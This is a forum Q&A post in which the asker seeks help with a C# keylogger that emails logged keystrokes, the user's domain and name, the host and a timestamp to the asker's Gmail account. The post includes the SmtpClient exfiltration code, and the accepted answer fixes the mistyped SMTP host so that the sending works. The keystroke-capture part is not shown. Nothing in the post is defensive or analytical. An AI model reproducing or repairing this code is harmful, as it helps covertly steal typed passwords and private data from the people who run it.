# System smtp Exception

Tags: c#, visual-studio, smtp

I am working on key logger that sends the keys to my email and I ran into a problem. I'm using visual studio C#, when I run the program, I get an exception "System.Net.Mail.SmtpException: 'Failure sending mail.'"
Is there a solution to this problem? 
Here is my code:

```
    ... emailBody += "\nUser: " + Environment.UserDomainName + " \\ " + Environment.UserName;
        emailBody += "\nhost " + host;
        emailBody += "\ntime: " + now.ToString();
        emailBody += logContents;

        SmtpClient client = new SmtpClient("smpt.gmail.com", 587);
        MailMessage mailMessage = new MailMessage();

        mailMessage.From = new MailAddress("email address");
        mailMessage.To.Add("email address");
        mailMessage.Subject = subject;
        client.UseDefaultCredentials = false;
        client.EnableSsl = true;
        client.Credentials = new System.Net.NetworkCredential("my email address", "my password");
        mailMessage.Body = emailBody;

        client.Send(mailMessage);
```

Answer (score 1, accepted):

The host used for SMTP transactions is wrong. You need to modify it to `smtp.gmail.com`, rather than `smpt`.

Comment: @Skantzy If this answer helps you, please click `√` to mark it as an answer.